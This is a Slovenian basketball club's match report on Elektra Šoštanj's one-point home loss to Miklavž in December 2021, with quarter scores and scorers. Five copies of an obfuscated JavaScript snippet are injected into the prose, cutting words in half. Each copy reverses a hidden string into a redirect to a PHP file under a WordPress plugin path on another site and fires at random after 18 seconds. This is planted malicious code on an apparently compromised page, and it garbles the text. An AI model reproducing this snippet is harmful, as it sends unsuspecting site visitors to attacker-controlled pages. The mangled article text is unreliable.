4. LIGA KZS: ELEKTRA LETO 2021 ZAKLJUČUJE S TESNIM PORAZOM PROTI MIKLAVŽU

Zadnja tekma v letu 2021 je prinesla drugi poraz v sezoni, v Športni dvorani Šoštanj je bila boljša ekipa Miklavža. Elektra je odlično odprla srečanje in že v prvi četrtini visoko povedla (20:7). Gostje so do polčasa znižali zaostanek, bilo je 43:37. Drugi polčas je začel v popolnem nasprotju s prvim, Miklavž je v dobrih dveh minutah izničil zaostanek ter začel počasi večati razliko v svojo korist. Elektra je prve to$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}čke dosegla šele v 4. minuti 3. četrtine (46:48), ki se je končala z občutno prednostjo Miklavža (61:69). V zadnji četrtini je Elektra prikazala najboljšo strelsko predstavo, kar pa vseeno ni bilo dovolj za zmago. 17 sekund pred koncem so imeli napad za zmago, ki pa se je žal zaključil z zgrešenim meto$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}m oz. blokado nasprotnika. Bolj kot minimalen poraz boli dejstvo, da igralcem Elektre pri zaključevanju akcij manjka zbranosti, saj je bilo zgrešenih ogromno polagajn in “zicerjev”, ki jih enostavno ne smeš zgrešiti. Še vedno je preveč zgrešenih prostih meto$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}v. Vseeno si fantje zaslužijo čestitke za borbo in vsi skupaj verjamemo, da se bodo po novem letu vrnili še močnejši in pripravljeni za nove zmage. Kljub nesrečnemu porazu nas veseli dejstvo, da so svoje minute dobro izkoristili prav vsi igralci, ki so sto$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}pili na parket.

18.12.2021, 19:00, Športna dvorana Šoštanj, 8. kolo

ELEKTRA ŠOŠTANJ 92:93 MIKLAVŽ
(25 : 14, 18 : 23, 18 : 32, 31 : 24)

Ojsteršek B. 22, Hasić 16, Babajič 14, Sovič 13, Ojsteršek V. 9, Aračič 7, Stropnik 5, Miklavžina 4, Ferenc T. 2.

Statistika

Naslednja tekma bo  8. januarja 2022 v Dravogradu, ko Elektra odhaja na gosto$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}vanje k ekipi Dravograd Koroška.

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki